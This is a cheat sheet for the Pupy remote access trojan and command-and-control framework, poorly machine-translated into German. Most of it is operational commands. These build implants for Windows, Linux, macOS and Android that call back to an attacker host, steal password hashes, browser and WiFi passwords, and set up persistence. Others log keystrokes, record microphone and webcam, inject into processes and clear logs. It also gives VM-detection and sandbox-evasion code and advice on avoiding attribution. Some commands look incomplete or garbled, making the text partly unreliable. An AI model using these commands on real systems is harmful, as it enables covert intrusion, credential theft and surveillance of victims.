Pupy C2 Framework Cheat Sheet
Überblick
Pupy ist ein Open-Source-, Cross-Platform Remote Access Tool (RAT) und Post-Exploitation Framework geschrieben in Python und C. Es unterstützt Windows-, Linux-, OSX- und Android-Plattformen mit Memory-only Ausführung Fähigkeiten und minimale Footprint-Design.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.
Installation
Gierinstallation
```bash
Clone repository
git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy
Install dependencies (Ubuntu/Debian)
sudo apt-get install python2.7-dev python-pip python-setuptools build-essential swig python-dev libssl-dev libffi-dev
Install Python requirements
pip install -r pupy/requirements.txt
Create workspace
./create-workspace.py -DG pupyws cd pupyws ```_
Docker Installation
```bash
Build Docker image
git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy docker build -t pupy .
Run Pupy in Docker
docker run -it -v /tmp/pupyws:/opt/pupy/pupyws pupy ```_
Windows Installation
```bash
Install Python 2.7
Download and install Microsoft Visual C++ Compiler for Python 2.7
Clone repository
git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy
Install requirements
pip install -r pupy/requirements.txt
Create workspace
python create-workspace.py pupyws cd pupyws ```_
Basisnutzung
Beginn des Pupy Servers
```bash
Start server with default configuration
./pupysh
Start with custom configuration
./pupysh --config custom_config.py
Start with specific transport
./pupysh --transport ssl ```_
Client Generation
```bash
Generate Windows client
gen -f client -O windows -A x86 -o windows_client.exe
Generate Linux client
gen -f client -O linux -A x64 -o linux_client
Generate Android APK
gen -f apk -o android_client.apk ```_
Befehlsnummer
Serververwaltung
| | Command | Description | |
| --- | --- |
| | help | Show help menu | |
| | sessions | List active sessions | |
| | session -i <id> | Interact with session | |
| | jobs | List running jobs | |
| | kill <job_id> | Kill running job | |
| | exit | Exit Pupy server | |
Client Generation
| | Command | Description | |
| --- | --- |
| | gen -h | Show generation help | |
| | gen -f client -O <os> -A <arch> | Generate client | |
| | gen -f apk | Generate Android APK | |
| | gen -f py | Generate Python payload | |
| | gen -f ps1 | Generate PowerShell payload | |
Sitzungs-Interaktion
| | Command | Description | |
| --- | --- |
| | info | Show session information | |
| | shell | Get interactive shell | |
| | upload <local> <remote> | Upload file | |
| | download <remote> <local> | Download file | |
| | screenshot | Take screenshot | |
| | webcam_snap | Take webcam snapshot | |
| | keylogger | Start keylogger | |
Optionen der Client-Generierung
Windows Clients
```bash
Windows executable (x86)
gen -f client -O windows -A x86 -o windows_x86.exe
Windows executable (x64)
gen -f client -O windows -A x64 -o windows_x64.exe
Windows DLL
gen -f dll -O windows -A x86 -o windows_dll.dll
Windows service executable
gen -f client -O windows -A x64 --service -o windows_service.exe
PowerShell payload
gen -f ps1 -o payload.ps1 ```_
Linux Clients
```bash
Linux ELF (x86)
gen -f client -O linux -A x86 -o linux_x86
Linux ELF (x64)
gen -f client -O linux -A x64 -o linux_x64
Linux shared library
gen -f so -O linux -A x64 -o linux_lib.so
Python payload
gen -f py -o payload.py ```_
macOS Clients
```bash
macOS binary
gen -f client -O darwin -A x64 -o macos_client
macOS application bundle
gen -f app -O darwin -A x64 -o macos_app.app ```_
Android Clients
```bash
Android APK
gen -f apk -o android_client.apk
Android APK with custom package name
gen -f apk --package com.example.app -o custom_android.apk ```_
Transportmöglichkeiten
SSL Transport
```bash
Start SSL listener
listen --port 443 ssl
Generate client with SSL transport
gen -f client -O windows -A x64 --transport ssl_connect --host 192.168.1.100:443 ```_
HTTP Transport
```bash
Start HTTP listener
listen --port 80 http
Generate client with HTTP transport
gen -f client -O windows -A x64 --transport http --host 192.168.1.100:80 ```_
TCP Transport
```bash
Start TCP listener
listen --port 4444 tcp
Generate client with TCP transport
gen -f client -O windows -A x64 --transport tcp_cleartext --host 192.168.1.100:4444 ```_
Transporte
```bash
Obfs3 transport
listen --port 8080 obfs3
Generate client with obfs3
gen -f client -O windows -A x64 --transport obfs3 --host 192.168.1.100:8080 ```_
Post-Exploitationsmodule
Systeminformationen
```bash
Get system information
run sysinfo
Get environment variables
run getenv
Get installed software
run installed_software
Get running processes
run ps
Get network connections
run netstat ```_
Credential Harvesting
```bash
Dump Windows credentials
run hashdump
Extract browser passwords
run browser_dump
Dump WiFi passwords
run wifi_passwords
Extract clipboard content
run clipboard ```_
Persistenz
```bash
Install persistence
run persistence
Create scheduled task (Windows)
run schtasks
Registry persistence (Windows)
run registry_persistence
Cron job persistence (Linux)
run cron_persistence ```_
Netzwerkaktivitäten
```bash
Port scanning
run portscan -t 192.168.1.0/24
Network discovery
run network_discovery
ARP spoofing
run arp_spoof -t 192.168.1.10 -g 192.168.1.1
DNS spoofing
run dns_spoof -d example.com -i 192.168.1.100 ```_
Überwachung
```bash
Start keylogger
run keylogger
Take screenshot
run screenshot
Record microphone
run record_mic -t 30
Webcam snapshot
run webcam_snap
Webcam stream
run webcam_stream ```_
Erweiterte Funktionen
Ausführung des Speichers
```bash
Load module in memory
load_module /path/to/module.py
Execute in memory
run memory_exec -f /path/to/executable
Reflective DLL loading (Windows)
run reflective_dll -f /path/to/dll.dll ```_
Prozessinjektion
```bash
Inject into process
run inject -p
Process hollowing
run process_hollow -t notepad.exe -f /path/to/payload
DLL injection
run dll_inject -p
Pivot
```bash
SOCKS proxy
run socks -p 1080
Port forwarding
run portfwd -L 8080:192.168.2.10:80
Reverse port forwarding
run portfwd -R 9090:127.0.0.1:22 ```_
Anti-Forensik
```bash
Clear event logs (Windows)
run clear_logs
Timestomp files
run timestomp -f /path/to/file -t "2020-01-01 12:00:00"
Secure delete
run secure_delete -f /path/to/file
Clear tracks
run clear_tracks ```_
Evasion Techniken
Belastbarkeit
```bash
Generate with packer
gen -f client -O windows -A x64 --packer upx -o packed_client.exe
Custom obfuscation
gen -f client -O windows -A x64 --obfuscate -o obfuscated_client.exe
Encrypted payload
gen -f client -O windows -A x64 --encrypt -o encrypted_client.exe ```_
Antianalyse
```python
VM detection
def check_vm(): import subprocess try: output = subprocess.check_output(['systeminfo'], shell=True) vm_indicators = ['VMware', 'VirtualBox', 'QEMU', 'Hyper-V'] for indicator in vm_indicators: if indicator in output.decode(): return True except: pass return False
Sandbox evasion
import time import random time.sleep(random.randint(60, 300)) # Random sleep ```_
Verkehrsobfukation
```bash
Domain fronting
gen -f client -O windows -A x64 --transport http --host cdn.example.com --front-domain legitimate-site.com
Custom User-Agent
gen -f client -O windows -A x64 --transport http --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" ```_
Konfiguration
Serverkonfiguration
```python
pupy.conf
[pupyd] workdir = pupyws scriptlets_path = packages/all;packages/windows;packages/linux;packages/darwin
[ssl] keyfile = keys/server.key certfile = keys/server.crt
[http] port = 80 ssl_port = 443
[logging] level = INFO file = pupy.log ```_
Client Konfiguration
```python
Custom transport configuration
TRANSPORT_KWARGS = \\{ 'ssl': \\{ 'cert_reqs': ssl.CERT_NONE, 'ssl_version': ssl.PROTOCOL_TLSv1_2, 'ciphers': 'ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM' \\}, 'http': \\{ 'user_agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'headers': \\{'Accept': 'text/html,application/xhtml+xml'\\}, 'proxy': \\{'http': 'http://proxy:8080'\\} \\} \\} ```_
Fehlerbehebung
Verbindungsprobleme
```bash
Check listener status
jobs
Test connectivity
telnet server_ip port
Check firewall rules
iptables -L netsh advfirewall show allprofiles ```_
Probleme der Client Generation
```bash
Install missing dependencies
pip install -r pupy/requirements.txt
Rebuild client templates
./create-workspace.py -DG pupyws
Check Python version
python --version # Should be 2.7.x ```_
Modul Fehler laden
```bash
Update module path
export PYTHONPATH=$PYTHONPATH:/opt/pupy/pupy
Reinstall requirements
pip install --upgrade -r pupy/requirements.txt
Check module dependencies
python -c "import module_name" ```_
Leistungsfragen
```bash
Reduce beacon interval
session -i
Optimize transport
Use faster transports like TCP for internal networks
Use compressed transports for slow connections
```_
Operationelle Sicherheit
Infrastrukturaufbau
- Verwenden Sie Umleitungen und Proxyketten
- Durchführung ordnungsgemäßer Zertifikatsverwaltung
- Verwenden Sie legitime Domains und Hosting
- Infrastruktur regelmäßig drehen
- Monitor für Erkennung und Zuschreibung
Kommunikationssicherheit
- Verwenden Sie verschlüsselte Transporte (SSL/TLS)
- Umsetzung der richtigen Schlüsselverwaltung
- Domänenfront verwenden, wo möglich
- Vary Kommunikationsmuster
- Implementierung der richtigen Fehlerbehandlung
Sicherheit am Arbeitsplatz
- Verwenden Sie die Fettbildung und Verpackung
- Implementieren von Anti-Analyse-Techniken
- Verwenden Sie gestufte Nutzlasten, wenn möglich
- Regelmäßig aktualisieren und rotieren Nutzlasten
- Test gegen aktuelle AV-Lösungen
Ressourcen
- Pupy GitHub Repository
- (__LINK_4___)
- n1nj4sec Blog
- Pupy Module Referenz
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Pupy C2 Framework. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *